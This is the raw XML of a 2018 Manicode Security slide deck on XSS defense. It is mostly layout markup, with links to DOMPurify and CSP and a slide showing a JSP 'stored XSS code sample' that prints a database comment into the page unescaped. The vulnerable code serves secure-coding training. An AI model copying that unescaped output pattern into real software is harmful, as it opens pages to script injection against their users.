              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33073100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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6172200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:noFill/>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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="2800" b="0" cap="none" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quote or special information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="DB3D16"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35277305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Poi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76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="465015"/>
            <a:ext cx="8229600" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197221863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67895"/>
            <a:ext cx="3886200" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C6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367893"/>
            <a:ext cx="4114800" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1800"/>
            </a:lvl1pPr>
            <a:lvl2pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C6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B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6356351"/>
            <a:ext cx="8229600" cy="365760"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>COPYRIGHT ©</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2018</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MANICODE SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16058011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10694"/>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457200" y="1371599"/>
            <a:ext cx="8229600" cy="4800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356351"/>
            <a:ext cx="457200" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1000" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181624358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9" r:id="rId6"/>
    <p:sldLayoutId id="2147483656" r:id="rId7"/>
    <p:sldLayoutId id="2147483657" r:id="rId8"/>
    <p:sldLayoutId id="2147483652" r:id="rId9"/>
    <p:sldLayoutId id="2147483654" r:id="rId10"/>
    <p:sldLayoutId id="2147483658" r:id="rId11"/>
    <p:sldLayoutId id="2147483655" r:id="rId12"/>
    <p:sldLayoutId id="2147483662" r:id="rId13"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:fade/>
  </p:transition>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="2800" kern="1200" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:body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hyperlink" Target="https://caniuse.com/#search=srcdoc" TargetMode="External"/><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w3.org/TR/CSP3/" TargetMode="Externa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inventropy.us/blog/constructing-an-xss-vector-using-no-letters"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jsfuck.com/"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tiff"/><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hyperlink" Target="https://github.com/cure53/DOMPurify" TargetMode="Externa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hyperlink" Target="https://cure53.de/purify"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hyperlink" Target="https://example.com/items.json"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hyperlink" Target="https://example.com/item.json"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hyperlink" Target="https://github.com/yahoo/serialize-javascript" TargetMode="External"/><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XSS Defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20970275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Persistent/Stored XSS Code Sample</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="codewindow.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3" cstate="print">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect b="14993"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1367894"/>
            <a:ext cx="8229052" cy="4663440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="986118" y="1852707"/>
            <a:ext cx="7432978" cy="3847762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> id = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Integer.parseInt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("id"));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>String query = "select * from forum where id=" + id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>stmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>conn.createStatement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ResultSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>stmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(query); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> != null) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rs.next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>	String comment = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>rs.getString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ("comment");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>User Comment : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;%= comment %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>%&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4244160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iframe Sandboxing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
